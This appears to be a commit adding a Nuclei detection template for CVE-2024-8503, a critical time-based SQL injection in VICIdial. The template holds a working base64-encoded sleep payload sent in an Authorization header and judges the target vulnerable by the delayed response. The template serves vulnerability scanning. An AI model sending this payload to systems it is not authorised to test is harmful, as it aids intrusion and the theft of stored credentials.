Merge pull request #10757 from Kazgangap/CVE-2024-8503

add CVE-2024-8503
patch-11
Ritik Chaddha 2024-09-19 07:31:07 +04:00 committed by GitHub
commit b1fc26d6e1
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 58 additions and 0 deletions

View File

@ -0,0 +1,58 @@
id: CVE-2024-8503
info:
name: VICIdial - SQL Injection
author: s4e-io
severity: critical
description: |
An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial to enumerate database records. By default, VICIdial stores plaintext credentials within the database.
reference:
- https://en.0day.today/exploit/39746
- https://github.com/Chocapikk/CVE-2024-8504
- https://nvd.nist.gov/vuln/detail/CVE-2024-8503
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-8503
cwe-id: CWE-89
epss-score: 0.00043
epss-percentile: 0.09586
metadata:
verified: true
max-request: 2
vendor: vicidial
product: vicidial
fofa-query: icon_hash="1375401192"
tags: cve,cve2024,vicidial,sqli
flow: http(1) && http(2)
http:
- raw:
- |
GET /vicidial/welcome.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"Agent Login","Timeclock","Administration")'
- 'contains(content_type,"text/html")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
@timeout 20s
GET /VERM/VERM_AJAX_functions.php?function=log_custom_report HTTP/1.1
Host: {{Hostname}}
Authorization: Basic JywnJyxzbGVlcCg2KSk7IzpiYXI=
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'contains(content_type,"text/html")'
- 'status_code == 200'
condition: and